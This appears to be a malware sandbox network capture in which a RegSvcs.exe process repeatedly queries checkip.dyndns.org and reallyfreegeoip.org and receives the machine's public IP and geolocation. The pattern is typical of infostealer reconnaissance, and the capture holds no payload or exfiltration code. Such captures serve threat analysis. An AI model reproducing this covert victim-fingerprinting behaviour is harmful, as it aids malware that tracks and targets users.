                                                                                                                  Jan 14, 2025 16:57:34.430164099 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:35.132913113 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:35 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 14, 2025 16:57:35.138232946 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 14, 2025 16:57:35.347882986 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:35 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 14, 2025 16:57:36.085391998 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 14, 2025 16:57:36.296035051 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:36 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.1049889132.226.247.73807432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:36.909997940 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 14, 2025 16:57:37.610177994 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:37 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.1049901132.226.247.73807432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:38.244467020 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 14, 2025 16:57:38.972536087 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:38 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.1049911132.226.247.73807432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:39.630228043 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:40.353435993 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:40 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.1049921132.226.247.73807432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:41.005021095 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:41.699500084 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:41 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.1049931132.226.247.73807432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:42.300997972 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:42.983154058 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:42 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.1049941132.226.247.73807432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:43.625154972 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:44.302015066 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:44 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.1049952132.226.247.73807432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 14, 2025 16:57:44.920208931 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 14, 2025 16:57:45.620203018 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:45 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.1049760104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:19 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:19 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185028
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TqQlpS9nXDReVO%2Fw9Z7zANBqVjiEwlsBIeXlzqseN8d0p3U34gQjA1CTgl85OFC64Cm5%2FWYkd7R6%2BOKfQnuaIJRzL5RoW21iYD%2B5roNZT9vJ0mRo8cCd7dZaOcHC3fw5rx2mqrsb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed231f9b872a4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1952&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1460730&cwnd=212&unsent_bytes=0&cid=98dfac1f758e113d&ts=188&x=0"
                                                                                                                  2025-01-14 15:57:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.1049766104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:19 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-14 15:57:20 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:19 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185029
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVtNks4%2FYETsDxCMU62YyOrl%2FGtbOj0uIDZbk2670obzyQAvE8ueOk%2FjqsGYh50HOPlnEJV7s7nNSAxxkIlOeDzUxab1CPMRtRYCwpVMDH1wfvNVW3hISxLb0KAgUbUyv%2FZrEwVl"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed237bfeec32e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3401&min_rtt=3340&rtt_var=1374&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=762601&cwnd=178&unsent_bytes=0&cid=d4d7150e3cb7022b&ts=171&x=0"
                                                                                                                  2025-01-14 15:57:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.1049778104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:21 UTC856INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:21 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185030
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DWXK2mn9dTovHuqoUPtoV1MlKVpKP1%2FEwZxGZIpnG%2FV9VWFuDcddGziHt6ha3NackZcnLf5NWqJzm0f5gXRATDBKRUiqNkt1teDfN2CeodzUMyogK4fx6If6QAEgXbqW3%2BvgkZF9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed23fe937c32e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3467&min_rtt=1570&rtt_var=1878&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1859872&cwnd=178&unsent_bytes=0&cid=1569bd5d6ffc5452&ts=152&x=0"
                                                                                                                  2025-01-14 15:57:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.1049785104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:22 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-14 15:57:22 UTC861INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:22 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185031
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuzyoBsjEeTljgu9APgJAjP%2F%2B3v8080LxdPRiOpPAC6YfGZ3S3mW4v0akjtvOGHZC4Ueeb2Wz6%2F9RX57bbBA6wFGj%2FmzrMcU82w1k9RLHu6siM%2B0V%2FqK7b61fhKN7p13iDxgaHFV"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed248192a1a48-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1949&rtt_var=737&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1477732&cwnd=157&unsent_bytes=0&cid=da8fd159a56f82c8&ts=166&x=0"
                                                                                                                  2025-01-14 15:57:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.1049796104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:23 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:24 UTC865INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:23 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185033
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wY2pI2HAjIPo13SJ06GKP5uGcYe4y8%2B1fTy3vEHH2nsDbTUpeOg4oZz%2Fk0b9u%2FNoPNgWHwqgKWNpo7WRCkw%2FZGTfWgqsD471TeXP%2FKoC68g13PYCyfx%2FH0myZFz%2Ft0J0l0l%2BeA1D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed250ba9d1a48-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1976&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1445544&cwnd=157&unsent_bytes=0&cid=b2e1b565dc8cbef1&ts=160&x=0"
